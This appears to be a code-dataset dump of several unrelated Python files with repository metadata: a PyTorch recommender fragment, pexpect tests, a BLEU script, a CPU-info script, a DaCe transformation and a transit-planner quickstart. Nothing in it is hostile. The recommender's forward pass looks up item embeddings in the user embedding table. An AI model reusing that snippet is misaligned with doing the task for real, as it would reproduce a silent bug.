self.userEmbd = nn.Embedding(user_num, embed_size)
self.itemEmbd = nn.Embedding(item_num, embed_size)
self.userBias = nn.Embedding(user_num, 1)
self.itemBias = nn.Embedding(item_num, 1)
self.overall_bias = nn.Parameter(torch.Tensor([0]))
def forward(self, user_idx, item_idx):
user_embedding = self.userEmbd(user_idx)
item_embedding = self.userEmbd(item_idx)
user_bias = self.userBias(user_idx)
item_bias = self.itemBias(item_idx)
bias = user_bias + item_bias + self.overall_bias
predictions = torch.sum(torch.mul(user_embedding, item_embedding), dim=1) + bias.flatten()
# # unbiased_rating = user_embedding item_embedding.T
# predictions = torch.mm(user_embedding, item_embedding.T)
# # add bias
# predictions = predictions + user_bias + item_bias.resize(item_bias.shape[0])
# # add overall bias
# predictions = predictions.flatten() + self.overall_bias
return predictions | 33.75 | 98 | 0.689459 |
795518ab2fc803f4ba31f8dc696f97b405f6dbda | 22,207 | py | Python | tests/test_expect.py | AlexThurston/pexpect | c694853403716ace2754cc1e039bf35ecdc17db6 | [
"0BSD"
] | null | null | null | tests/test_expect.py | AlexThurston/pexpect | c694853403716ace2754cc1e039bf35ecdc17db6 | [
"0BSD"
] | null | null | null | tests/test_expect.py | AlexThurston/pexpect | c694853403716ace2754cc1e039bf35ecdc17db6 | [
"0BSD"
] | null | null | null | #!/usr/bin/env python
'''
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <noah@noah.org>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
import multiprocessing
import unittest
import subprocess
import time
import signal
import sys
import os
import pexpect
from . import PexpectTestCase
from .utils import no_coverage_env
# Many of these test cases blindly assume that sequential directory
# listings of the /bin directory will yield the same results.
# This may not be true, but seems adequate for testing now.
# I should fix this at some point.
FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
def hex_dump(src, length=16):
result=[]
for i in xrange(0, len(src), length):
s = src[i:i+length]
hexa = ' '.join(["%02X"%ord(x) for x in s])
printable = s.translate(FILTER)
result.append("%04X %-*s %s\n" % (i, length*3, hexa, printable))
return ''.join(result)
def hex_diff(left, right):
diff = ['< %s\n> %s' % (_left, _right,) for _left, _right in zip(
hex_dump(left).splitlines(), hex_dump(right).splitlines())
if _left != _right]
return '\n' + '\n'.join(diff,)
class ExpectTestCase (PexpectTestCase.PexpectTestCase):
def test_expect_basic (self):
p = pexpect.spawn('cat', echo=False, timeout=5)
p.sendline (b'Hello')
p.sendline (b'there')
p.sendline (b'Mr. Python')
p.expect (b'Hello')
p.expect (b'there')
p.expect (b'Mr. Python')
p.sendeof ()
p.expect (pexpect.EOF)
def test_expect_exact_basic (self):
p = pexpect.spawn('cat', echo=False, timeout=5)
p.sendline (b'Hello')
p.sendline (b'there')
p.sendline (b'Mr. Python')
p.expect_exact (b'Hello')
p.expect_exact (b'there')
p.expect_exact (b'Mr. Python')
p.sendeof ()
p.expect_exact (pexpect.EOF)
def test_expect_ignore_case(self):
'''This test that the ignorecase flag will match patterns
even if case is different using the regex (?i) directive.
'''
p = pexpect.spawn('cat', echo=False, timeout=5)
p.sendline (b'HELLO')
p.sendline (b'there')
p.expect (b'(?i)hello')
p.expect (b'(?i)THERE')
p.sendeof ()
p.expect (pexpect.EOF)
def test_expect_ignore_case_flag(self):
'''This test that the ignorecase flag will match patterns
even if case is different using the ignorecase flag.
'''
p = pexpect.spawn('cat', echo=False, timeout=5)
p.ignorecase = True
p.sendline (b'HELLO')
p.sendline (b'there')
p.expect (b'hello')
p.expect (b'THERE')
p.sendeof ()
p.expect (pexpect.EOF)
def test_expect_order (self):
'''This tests that patterns are matched in the same order as given in the pattern_list.
(Or does it? Doesn't it also pass if expect() always chooses
(one of the) the leftmost matches in the input? -- grahn)
... agreed! -jquast, the buffer ptr isn't forwarded on match, see first two test cases
'''
p = pexpect.spawn('cat', echo=False, timeout=5)
self._expect_order(p)
def test_expect_order_exact (self):
'''Like test_expect_order(), but using expect_exact().
'''
p = pexpect.spawn('cat', echo=False, timeout=5)
p.expect = p.expect_exact
self._expect_order(p)
def _expect_order (self, p):
p.sendline (b'1234')
p.sendline (b'abcd')
p.sendline (b'wxyz')
p.sendline (b'7890')
p.sendeof ()
index = p.expect ([
b'1234',
b'abcd',
b'wxyz',
pexpect.EOF,
b'7890' ])
assert index == 0, (index, p.before, p.after)
index = p.expect ([
b'54321',
pexpect.TIMEOUT,
b'1234',
b'abcd',
b'wxyz',
pexpect.EOF], timeout=5)
assert index == 3, (index, p.before, p.after)
index = p.expect ([
b'54321',
pexpect.TIMEOUT,
b'1234',
b'abcd',
b'wxyz',
pexpect.EOF], timeout=5)
assert index == 4, (index, p.before, p.after)
index = p.expect ([
pexpect.EOF,
b'abcd',
b'wxyz',
b'7890' ])
assert index == 3, (index, p.before, p.after)
index = p.expect ([
b'abcd',
b'wxyz',
b'7890',
pexpect.EOF])
assert index == 3, (index, p.before, p.after)
def test_expect_setecho_off(self):
'''This tests that echo may be toggled off.
'''
p = pexpect.spawn('cat', echo=True, timeout=5)
try:
self._expect_echo_toggle(p)
except IOError:
if sys.platform.lower().startswith('sunos'):
if hasattr(unittest, 'SkipTest'):
raise unittest.SkipTest("Not supported on this platform.")
return 'skip'
raise
def test_expect_setecho_off_exact(self):
p = pexpect.spawn('cat', echo=True, timeout=5)
p.expect = p.expect_exact
try:
self._expect_echo_toggle(p)
except IOError:
if sys.platform.lower().startswith('sunos'):
if hasattr(unittest, 'SkipTest'):
raise unittest.SkipTest("Not supported on this platform.")
return 'skip'
raise
def test_waitnoecho(self):
" Tests setecho(False) followed by waitnoecho() "
p = pexpect.spawn('cat', echo=False, timeout=5)
try:
p.setecho(False)
p.waitnoecho()
except IOError:
if sys.platform.lower().startswith('sunos'):
if hasattr(unittest, 'SkipTest'):
raise unittest.SkipTest("Not supported on this platform.")
return 'skip'
raise
def test_waitnoecho_order(self):
''' This tests that we can wait on a child process to set echo mode.
For example, this tests that we could wait for SSH to set ECHO False
when asking of a password. This makes use of an external script
echo_wait.py. '''
p1 = pexpect.spawn('%s echo_wait.py' % self.PYTHONBIN)
start = time.time()
try:
p1.waitnoecho(timeout=10)
except IOError:
if sys.platform.lower().startswith('sunos'):
if hasattr(unittest, 'SkipTest'):
raise unittest.SkipTest("Not supported on this platform.")
return 'skip'
raise
end_time = time.time() - start
assert end_time < 10 and end_time > 2, "waitnoecho did not set ECHO off in the expected window of time."
# test that we actually timeout and return False if ECHO is never set off.
p1 = pexpect.spawn('cat')
start = time.time()
retval = p1.waitnoecho(timeout=4)
end_time = time.time() - start
assert end_time > 3, "waitnoecho should have waited longer than 2 seconds. retval should be False, retval=%d"%retval
assert retval==False, "retval should be False, retval=%d"%retval
# This one is mainly here to test default timeout for code coverage.
p1 = pexpect.spawn('%s echo_wait.py' % self.PYTHONBIN)
start = time.time()
p1.waitnoecho()
end_time = time.time() - start
assert end_time < 10, "waitnoecho did not set ECHO off in the expected window of time."
def test_expect_echo (self):
'''This tests that echo is on by default.
'''
p = pexpect.spawn('cat', echo=True, timeout=5)
self._expect_echo(p)
def test_expect_echo_exact (self):
'''Like test_expect_echo(), but using expect_exact().
'''
p = pexpect.spawn('cat', echo=True, timeout=5)
p.expect = p.expect_exact
self._expect_echo(p)
def _expect_echo (self, p):
p.sendline (b'1234') # Should see this twice (once from tty echo and again from cat).
index = p.expect ([
b'1234',
b'abcd',
b'wxyz',
pexpect.EOF,
pexpect.TIMEOUT])
assert index == 0, "index="+str(index)+"\n"+p.before
index = p.expect ([
b'1234',
b'abcd',
b'wxyz',
pexpect.EOF])
assert index == 0, "index="+str(index)
def _expect_echo_toggle(self, p):
p.sendline (b'1234') # Should see this twice (once from tty echo and again from cat).
index = p.expect ([
b'1234',
b'abcd',
b'wxyz',
pexpect.EOF,
pexpect.TIMEOUT])
assert index == 0, "index="+str(index)+"\n"+p.before
index = p.expect ([
b'1234',
b'abcd',
b'wxyz',
pexpect.EOF])
assert index == 0, "index="+str(index)
p.setecho(0) # Turn off tty echo
p.waitnoecho()
p.sendline (b'abcd') # Now, should only see this once.
p.sendline (b'wxyz') # Should also be only once.
index = p.expect ([
pexpect.EOF,
pexpect.TIMEOUT,
b'abcd',
b'wxyz',
b'1234'])
assert index == 2, "index="+str(index)
index = p.expect ([
pexpect.EOF,
b'abcd',
b'wxyz',
b'7890'])
assert index == 2, "index="+str(index)
p.setecho(1) # Turn on tty echo
p.sendline (b'7890') # Should see this twice.
index = p.expect ([pexpect.EOF,b'abcd',b'wxyz',b'7890'])
assert index == 3, "index="+str(index)
index = p.expect ([pexpect.EOF,b'abcd',b'wxyz',b'7890'])
assert index == 3, "index="+str(index)
p.sendeof()
def test_expect_index (self):
'''This tests that mixed list of regex strings, TIMEOUT, and EOF all
return the correct index when matched.
'''
p = pexpect.spawn('cat', echo=False, timeout=5)
self._expect_index(p)
def test_expect_index_exact (self):
'''Like test_expect_index(), but using expect_exact().
'''
p = pexpect.spawn('cat', echo=False, timeout=5)
p.expect = p.expect_exact
self._expect_index(p)
def _expect_index (self, p):
p.sendline (b'1234')
index = p.expect ([b'abcd',b'wxyz',b'1234',pexpect.EOF])
assert index == 2, "index="+str(index)
p.sendline (b'abcd')
index = p.expect ([pexpect.TIMEOUT,b'abcd',b'wxyz',b'1234',pexpect.EOF])
assert index == 1, "index="+str(index)+str(p)
p.sendline (b'wxyz')
index = p.expect ([b'54321',pexpect.TIMEOUT,b'abcd',b'wxyz',b'1234',pexpect.EOF])
assert index == 3, "index="+str(index) # Expect 'wxyz'
p.sendline (b'$*!@?')
index = p.expect ([b'54321',pexpect.TIMEOUT,b'abcd',b'wxyz',b'1234',pexpect.EOF],
timeout=1)
assert index == 1, "index="+str(index) # Expect TIMEOUT
p.sendeof ()
index = p.expect ([b'54321',pexpect.TIMEOUT,b'abcd',b'wxyz',b'1234',pexpect.EOF])
assert index == 5, "index="+str(index) # Expect EOF
def test_expect (self):
the_old_way = subprocess.Popen(args=['ls', '-l', '/bin'],
stdout=subprocess.PIPE).communicate()[0].rstrip()
p = pexpect.spawn('ls -l /bin')
the_new_way = b''
while 1:
i = p.expect ([b'\n', pexpect.EOF])
the_new_way = the_new_way + p.before
if i == 1:
break
the_new_way = the_new_way.rstrip()
the_new_way = the_new_way.replace(b'\r\n', b'\n'
).replace(b'\r', b'\n').replace(b'\n\n', b'\n').rstrip()
the_old_way = the_old_way.replace(b'\r\n', b'\n'
).replace(b'\r', b'\n').replace(b'\n\n', b'\n').rstrip()
assert the_old_way == the_new_way, hex_diff(the_old_way, the_new_way)
def test_expect_exact (self):
the_old_way = subprocess.Popen(args=['ls', '-l', '/bin'],
stdout=subprocess.PIPE).communicate()[0].rstrip()
p = pexpect.spawn('ls -l /bin')
the_new_way = b''
while 1:
i = p.expect_exact ([b'\n', pexpect.EOF])
the_new_way = the_new_way + p.before
if i == 1:
break
the_new_way = the_new_way.replace(b'\r\n', b'\n'
).replace(b'\r', b'\n').replace(b'\n\n', b'\n').rstrip()
the_old_way = the_old_way.replace(b'\r\n', b'\n'
).replace(b'\r', b'\n').replace(b'\n\n', b'\n').rstrip()
assert the_old_way == the_new_way, hex_diff(the_old_way, the_new_way)
p = pexpect.spawn('echo hello.?world')
i = p.expect_exact(b'.?')
self.assertEqual(p.before, b'hello')
self.assertEqual(p.after, b'.?')
def test_expect_eof (self):
the_old_way = subprocess.Popen(args=['/bin/ls', '-l', '/bin'],
stdout=subprocess.PIPE).communicate()[0].rstrip()
p = pexpect.spawn('/bin/ls -l /bin')
p.expect(pexpect.EOF) # This basically tells it to read everything. Same as pexpect.run() function.
the_new_way = p.before
the_new_way = the_new_way.replace(b'\r\n', b'\n'
).replace(b'\r', b'\n').replace(b'\n\n', b'\n').rstrip()
the_old_way = the_old_way.replace(b'\r\n', b'\n'
).replace(b'\r', b'\n').replace(b'\n\n', b'\n').rstrip()
assert the_old_way == the_new_way, hex_diff(the_old_way, the_new_way)
def test_expect_timeout (self):
p = pexpect.spawn('cat', timeout=5)
p.expect(pexpect.TIMEOUT) # This tells it to wait for timeout.
self.assertEqual(p.after, pexpect.TIMEOUT)
def test_unexpected_eof (self):
p = pexpect.spawn('ls -l /bin')
try:
p.expect('_Z_XY_XZ') # Probably never see this in ls output.
except pexpect.EOF:
pass
else:
self.fail ('Expected an EOF exception.')
def test_buffer_interface(self):
p = pexpect.spawn('cat', timeout=5)
p.sendline (b'Hello')
p.expect (b'Hello')
assert len(p.buffer)
p.buffer = b'Testing'
p.sendeof ()
def test_before_across_chunks(self):
# https://github.com/pexpect/pexpect/issues/478
child = pexpect.spawn(
'''/bin/bash -c "openssl rand -base64 {} | head -500 | nl --number-format=rz --number-width=5 2>&1 ; echo 'PATTERN!!!'"'''.format(1024 * 1024 * 2),
searchwindowsize=128
)
child.expect(['PATTERN'])
assert len(child.before.splitlines()) == 500
assert child.after == b'PATTERN'
assert child.buffer == b'!!!\r\n'
def _before_after(self, p):
p.timeout = 5
p.expect(b'5')
self.assertEqual(p.after, b'5')
assert p.before.startswith(b'[0, 1, 2'), p.before
p.expect(b'50')
self.assertEqual(p.after, b'50')
assert p.before.startswith(b', 6, 7, 8'), p.before[:20]
assert p.before.endswith(b'48, 49, '), p.before[-20:]
p.expect(pexpect.EOF)
self.assertEqual(p.after, pexpect.EOF)
assert p.before.startswith(b', 51, 52'), p.before[:20]
assert p.before.endswith(b', 99]\r\n'), p.before[-20:]
def test_before_after(self):
'''This tests expect() for some simple before/after things.
'''
p = pexpect.spawn('%s -Wi list100.py' % self.PYTHONBIN, env=no_coverage_env())
self._before_after(p)
def test_before_after_exact(self):
'''This tests some simple before/after things, for
expect_exact(). (Grahn broke it at one point.)
'''
p = pexpect.spawn('%s -Wi list100.py' % self.PYTHONBIN, env=no_coverage_env())
# mangle the spawn so we test expect_exact() instead
p.expect = p.expect_exact
self._before_after(p)
def _ordering(self, p):
p.timeout = 20
p.expect(b'>>> ')
p.sendline('list(range(4*3))')
self.assertEqual(p.expect([b'5,', b'5,']), 0)
p.expect(b'>>> ')
p.sendline(b'list(range(4*3))')
self.assertEqual(p.expect([b'7,', b'5,']), 1)
p.expect(b'>>> ')
p.sendline(b'list(range(4*3))')
self.assertEqual(p.expect([b'5,', b'7,']), 0)
p.expect(b'>>> ')
p.sendline(b'list(range(4*5))')
self.assertEqual(p.expect([b'2,', b'12,']), 0)
p.expect(b'>>> ')
p.sendline(b'list(range(4*5))')
self.assertEqual(p.expect([b'12,', b'2,']), 1)
def test_ordering(self):
'''This tests expect() for which pattern is returned
when many may eventually match. I (Grahn) am a bit
confused about what should happen, but this test passes
with pexpect 2.1.
'''
p = pexpect.spawn(self.PYTHONBIN)
self._ordering(p)
def test_ordering_exact(self):
'''This tests expect_exact() for which pattern is returned
when many may eventually match. I (Grahn) am a bit
confused about what should happen, but this test passes
for the expect() method with pexpect 2.1.
'''
p = pexpect.spawn(self.PYTHONBIN)
# mangle the spawn so we test expect_exact() instead
p.expect = p.expect_exact
self._ordering(p)
def _greed(self, expect):
# End at the same point: the one with the earliest start should win
self.assertEqual(expect([b'3, 4', b'2, 3, 4']), 1)
# Start at the same point: first pattern passed wins
self.assertEqual(expect([b'5,', b'5, 6']), 0)
# Same pattern passed twice: first instance wins
self.assertEqual(expect([b'7, 8', b'7, 8, 9', b'7, 8']), 0)
def _greed_read1(self, expect):
# Here, one has an earlier start and a later end. When processing
# one character at a time, the one that finishes first should win,
# because we don't know about the other match when it wins.
# If maxread > 1, this behaviour is currently undefined, although in
# most cases the one that starts first will win.
self.assertEqual(expect([b'1, 2, 3', b'2,']), 1)
def test_greed(self):
p = pexpect.spawn(self.PYTHONBIN + ' list100.py')
self._greed(p.expect)
p = pexpect.spawn(self.PYTHONBIN + ' list100.py', maxread=1)
self._greed_read1(p.expect)
def test_greed_exact(self):
p = pexpect.spawn(self.PYTHONBIN + ' list100.py')
self._greed(p.expect_exact)
p = pexpect.spawn(self.PYTHONBIN + ' list100.py', maxread=1)
self._greed_read1(p.expect_exact)
def test_bad_arg(self):
p = pexpect.spawn('cat')
with self.assertRaisesRegexp(TypeError, '.*must be one of'):
p.expect(1)
with self.assertRaisesRegexp(TypeError, '.*must be one of'):
p.expect([1, b'2'])
with self.assertRaisesRegexp(TypeError, '.*must be one of'):
p.expect_exact(1)
with self.assertRaisesRegexp(TypeError, '.*must be one of'):
p.expect_exact([1, b'2'])
def test_timeout_none(self):
p = pexpect.spawn('echo abcdef', timeout=None)
p.expect('abc')
p.expect_exact('def')
p.expect(pexpect.EOF)
def test_signal_handling(self):
'''
This tests the error handling of a signal interrupt (usually a
SIGWINCH generated when a window is resized), but in this test, we
are substituting an ALARM signal as this is much easier for testing
and is treated the same as a SIGWINCH.
To ensure that the alarm fires during the expect call, we are
setting the signal to alarm after 1 second while the spawned process
sleeps for 2 seconds prior to sending the expected output.
'''
def noop(x, y):
pass
signal.signal(signal.SIGALRM, noop)
p1 = pexpect.spawn('%s sleep_for.py 2' % self.PYTHONBIN, timeout=5)
p1.expect('READY')
signal.alarm(1)
p1.expect('END')
def test_stdin_closed(self):
'''
Ensure pexpect continues to operate even when stdin is closed
'''
class Closed_stdin_proc(multiprocessing.Process):
def run(self):
sys.__stdin__.close()
cat = pexpect.spawn('cat')
cat.sendeof()
cat.expect(pexpect.EOF)
proc = Closed_stdin_proc()
proc.start()
proc.join()
assert proc.exitcode == 0
def test_stdin_stdout_closed(self):
'''
Ensure pexpect continues to operate even when stdin and stdout is closed
'''
class Closed_stdin_stdout_proc(multiprocessing.Process):
def run(self):
sys.__stdin__.close()
sys.__stdout__.close()
cat = pexpect.spawn('cat')
cat.sendeof()
cat.expect(pexpect.EOF)
proc = Closed_stdin_stdout_proc()
proc.start()
proc.join()
assert proc.exitcode == 0
if __name__ == '__main__':
unittest.main()
suite = unittest.makeSuite(ExpectTestCase, 'test')
| 36.827529 | 159 | 0.570226 |
795518ab8b585c9ecd2d51b20a561639c2251386 | 4,650 | py | Python | models/language_translation/tensorflow/transformer_mlperf/training/fp32/transformer/compute_bleu.py | yangw1234/models-1 | 7e7f484f4f22c760f9a5af836f57a3602b4fa7a6 | [
"Apache-2.0"
] | 357 | 2019-01-23T23:54:30.000Z | 2022-03-31T05:32:25.000Z | models/language_translation/tensorflow/transformer_mlperf/training/fp32/transformer/compute_bleu.py | yangw1234/models-1 | 7e7f484f4f22c760f9a5af836f57a3602b4fa7a6 | [
"Apache-2.0"
] | 65 | 2019-02-06T15:35:35.000Z | 2022-03-25T09:56:48.000Z | models/language_translation/tensorflow/transformer_mlperf/training/fp32/transformer/compute_bleu.py | yangw1234/models-1 | 7e7f484f4f22c760f9a5af836f57a3602b4fa7a6 | [
"Apache-2.0"
] | 164 | 2019-02-06T15:05:57.000Z | 2022-03-31T11:48:14.000Z | # Copyright 2018 MLBenchmark Group. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Script to compute official BLEU score.
Source:
https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/utils/bleu_hook.py
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import re
import sys
import unicodedata
import six
import tensorflow as tf
from utils import metrics
class UnicodeRegex(object):
"""Ad-hoc hack to recognize all punctuation and symbols."""
def __init__(self):
punctuation = self.property_chars("P")
self.nondigit_punct_re = re.compile(r"([^\d])([" + punctuation + r"])")
self.punct_nondigit_re = re.compile(r"([" + punctuation + r"])([^\d])")
self.symbol_re = re.compile("([" + self.property_chars("S") + "])")
def property_chars(self, prefix):
return "".join(six.unichr(x) for x in range(sys.maxunicode)
if unicodedata.category(six.unichr(x)).startswith(prefix))
uregex = UnicodeRegex()
def bleu_tokenize(string):
r"""Tokenize a string following the official BLEU implementation.
See https://github.com/moses-smt/mosesdecoder/'
'blob/master/scripts/generic/mteval-v14.pl#L954-L983
In our case, the input string is expected to be just one line
and no HTML entities de-escaping is needed.
So we just tokenize on punctuation and symbols,
except when a punctuation is preceded and followed by a digit
(e.g. a comma/dot as a thousand/decimal separator).
Note that a numer (e.g. a year) followed by a dot at the end of sentence
is NOT tokenized,
i.e. the dot stays with the number because `s/(\p{P})(\P{N})/ $1 $2/g`
does not match this case (unless we add a space after each sentence).
However, this error is already in the original mteval-v14.pl
and we want to be consistent with it.
Args:
string: the input string
Returns:
a list of tokens
"""
string = uregex.nondigit_punct_re.sub(r"\1 \2 ", string)
string = uregex.punct_nondigit_re.sub(r" \1 \2", string)
string = uregex.symbol_re.sub(r" \1 ", string)
return string.split()
def bleu_wrapper(ref_filename, hyp_filename, case_sensitive=False):
"""Compute BLEU for two files (reference and hypothesis translation)."""
ref_lines = tf.io.gfile.GFile(ref_filename).read().strip().splitlines()
hyp_lines = tf.io.gfile.GFile(hyp_filename).read().strip().splitlines()
if len(ref_lines) != len(hyp_lines):
raise ValueError("Reference and translation files have different number of "
"lines.")
if not case_sensitive:
ref_lines = [x.lower() for x in ref_lines]
hyp_lines = [x.lower() for x in hyp_lines]
ref_tokens = [bleu_tokenize(x) for x in ref_lines]
hyp_tokens = [bleu_tokenize(x) for x in hyp_lines]
return metrics.compute_bleu(ref_tokens, hyp_tokens) * 100
def main(unused_argv):
if FLAGS.bleu_variant is None or "uncased" in FLAGS.bleu_variant:
score = bleu_wrapper(FLAGS.reference, FLAGS.translation, False)
print("Case-insensitive results:", score)
if FLAGS.bleu_variant is None or "cased" in FLAGS.bleu_variant:
score = bleu_wrapper(FLAGS.reference, FLAGS.translation, True)
print("Case-sensitive results:", score)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--translation", "-t", type=str, default=None, required=True,
help="[default: %(default)s] File containing translated text.",
metavar="<T>")
parser.add_argument(
"--reference", "-r", type=str, default=None, required=True,
help="[default: %(default)s] File containing reference translation",
metavar="<R>")
parser.add_argument(
"--bleu_variant", "-bv", type=str, choices=["uncased", "cased"],
nargs="*", default=None,
help="Specify one or more BLEU variants to calculate (both are "
"calculated by default. Variants: \"cased\" or \"uncased\".",
metavar="<BV>")
FLAGS, unparsed = parser.parse_known_args()
main(sys.argv)
| 36.328125 | 88 | 0.696559 |
795518c97aab9e1a01e938e0e77af6a8f762ca08 | 1,168 | py | Python | cpu.py | ArkAngeL43/cpu-info | d7da58718ca7ea85174e321e870a085856154184 | [
"MIT"
] | null | null | null | cpu.py | ArkAngeL43/cpu-info | d7da58718ca7ea85174e321e870a085856154184 | [
"MIT"
] | null | null | null | cpu.py | ArkAngeL43/cpu-info | d7da58718ca7ea85174e321e870a085856154184 | [
"MIT"
] | null | null | null | import os
import sys
import psutil
import colorama
import time
from colorama import Fore, Back, Style
os.system(' clear ')
print(":::::::::::::::::::::::::::::::::::::")
time.sleep(0.1)
print(": Created and designed by Ark Angel :")
time.sleep(0.1)
print(":::::::::::::::::::::::::::::::::::::")
time.sleep(0.1)
print(":::::::::::::::::::::::::::::::::::::")
os.system(' date ')
print(":::::::::::::::::::::::::::::::::::::")
time.sleep(4)
os.system(' clear ')
print(Fore.MAGENTA+"================CORE===============")
print("Physical cores:", psutil.cpu_count(logical=False))
print("Total cores:", psutil.cpu_count(logical=True))
print(Fore.YELLOW+"=================FREQ================")
cpufreq = psutil.cpu_freq()
print(f"Max Frequency: {cpufreq.max:.2f}Mhz")
print(f"Min Frequency: {cpufreq.min:.2f}Mhz")
print(f"CUrrent Frequency: {cpufreq.current:.2f}Mhz")
print(Fore.MAGENTA+"================USAGE==============")
print("CPU Usage:")
for i, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)):
print(f"Core {i}: {percentage}%")
print(Fore.YELLOW+"==============TOTAL================")
print(f"Total CPU Usage: {psutil.cpu_percent()}%")
| 34.352941 | 76 | 0.550514 |
795518d398345f195888040b978ddfa27f016074 | 3,375 | py | Python | dace/frontend/tensorflow/transformations/redundant_array.py | tobiasholenstein/dace | 38fb56d12b59aa8dfe8bb1ff0068e29c5c75efc9 | [
"BSD-3-Clause"
] | null | null | null | dace/frontend/tensorflow/transformations/redundant_array.py | tobiasholenstein/dace | 38fb56d12b59aa8dfe8bb1ff0068e29c5c75efc9 | [
"BSD-3-Clause"
] | null | null | null | dace/frontend/tensorflow/transformations/redundant_array.py | tobiasholenstein/dace | 38fb56d12b59aa8dfe8bb1ff0068e29c5c75efc9 | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2019-2020 ETH Zurich and the DaCe authors. All rights reserved.
""" Contains classes that implement a redundant array removal transformation.
"""
from dace.sdfg import nodes
from dace.sdfg import utils as sdutil
from dace.transformation import transformation as pm
from dace.config import Config
class TensorflowRedundantArray(pm.Transformation):
""" Implements the redundant array removal transformation, applied
to remove ReadVariableOps and control dependencies. """
_arrays_removed = 0
_in_array = nodes.AccessNode("_")
_out_array = nodes.AccessNode("_")
@staticmethod
def expressions():
return [
sdutil.node_path_graph(TensorflowRedundantArray._in_array,
TensorflowRedundantArray._out_array)
]
@staticmethod
def can_be_applied(graph, candidate, expr_index, sdfg, strict=False):
in_array = graph.nodes()[candidate[TensorflowRedundantArray._in_array]]
out_array = graph.nodes()[candidate[
TensorflowRedundantArray._out_array]]
# Just to be sure, check for the OP name in the out array
if not ("ReadVariable" in out_array.data
or "control_dependency" in out_array.data):
return False
# Make sure that the candidate is a transient variable
if not in_array.desc(sdfg).transient:
return False
# Make sure that both arrays are using the same storage location
if in_array.desc(sdfg).storage != out_array.desc(sdfg).storage:
return False
# Only apply if arrays are of same shape (no need to modify subset)
if len(in_array.desc(sdfg).shape) != len(
out_array.desc(sdfg).shape) or any(i != o for i, o in zip(
in_array.desc(sdfg).shape,
out_array.desc(sdfg).shape)):
return False
return True
@staticmethod
def match_to_str(graph, candidate):
out_array = graph.nodes()[candidate[
TensorflowRedundantArray._out_array]]
return "Remove " + str(out_array)
def apply(self, sdfg):
def gnode(nname):
return graph.nodes()[self.subgraph[nname]]
graph = sdfg.nodes()[self.state_id]
in_array = gnode(TensorflowRedundantArray._in_array)
out_array = gnode(TensorflowRedundantArray._out_array)
for e in graph.out_edges(out_array):
# Modify all outgoing edges to point to in_array
path = graph.memlet_tree(e)
for pe in path:
if pe.data.data == out_array.data:
pe.data.data = in_array.data
# Preemptively add edge from in_array to out_array's adjacent
# nodes.
new_memlet = e.data
new_memlet.data = in_array.data
graph.add_edge(in_array, e.src_conn, e.dst, e.dst_conn, new_memlet)
graph.remove_edge(e)
try:
assert len(graph.in_edges(out_array)) == 1
except AssertionError:
print("Multiple in-edges for ", str(out_array))
e = graph.in_edges(out_array)[0]
graph.remove_edge(e)
# Finally, remove out_array node
graph.remove_node(out_array)
if Config.get_bool("debugprint"):
TensorflowRedundantArray._arrays_removed += 1
| 35.904255 | 79 | 0.634963 |
795519b0009eaed7f52a53feaa0252dfd6272861 | 1,170 | py | Python | docs/source/quickstart.py | Mause/pytransperth | 411c6a38b8451dc917927bdc4fdb70aeb9acd52b | [
"MIT"
] | null | null | null | docs/source/quickstart.py | Mause/pytransperth | 411c6a38b8451dc917927bdc4fdb70aeb9acd52b | [
"MIT"
] | null | null | null | docs/source/quickstart.py | Mause/pytransperth | 411c6a38b8451dc917927bdc4fdb70aeb9acd52b | [
"MIT"
] | null | null | null | import os
import sys
sys.path.insert(
0,
os.path.join(os.path.dirname(__file__), '..', '..')
)
# create the Location object you wish to resolve;
from transperth.jp.location import (
Location,
ResolvedLocation,
determine_location
)
from_location = Location.from_location('Curtin University, Perth')
to_location = Location.from_location('Arena Joondalup')
# then we resolve it into something that the transperth api will accept
locations = determine_location(from_location, to_location)
# determine_location will return a dictionary like so;
{
'<DIRECTION>': [
ResolvedLocation('<NAME>', '<CODE>'),
# etc
]
}
# it would be reasonable to assume the first result is correct,
# or to let the end user choose from a list
from_location = locations['from'][0]
to_location = locations['to'][0]
# once we have these, we can grab the routes
from transperth.jp.routes import determine_routes
routes = determine_routes(from_location, to_location)
# take your pick of the routes
route = routes[0]
# and use 'em how you like
from transperth.smart_rider.trips import timedelta_repr
print(timedelta_repr(route['meta']['duration']))
| 24.893617 | 71 | 0.733333 |
79551a233b77fd2cb307c95dfa9a31e792ffa8bb | 667 | py | Python | coursework2/task3/combiner_2.py | foundnet/UOE_EP_coursework1 | 25ab8ff2beaa4fbde5a0d4519abb84d8e43cf9d8 | [
"Apache-2.0"
] | null | null | null | coursework2/task3/combiner_2.py | foundnet/UOE_EP_coursework1 | 25ab8ff2beaa4fbde5a0d4519abb84d8e43cf9d8 | [
"Apache-2.0"
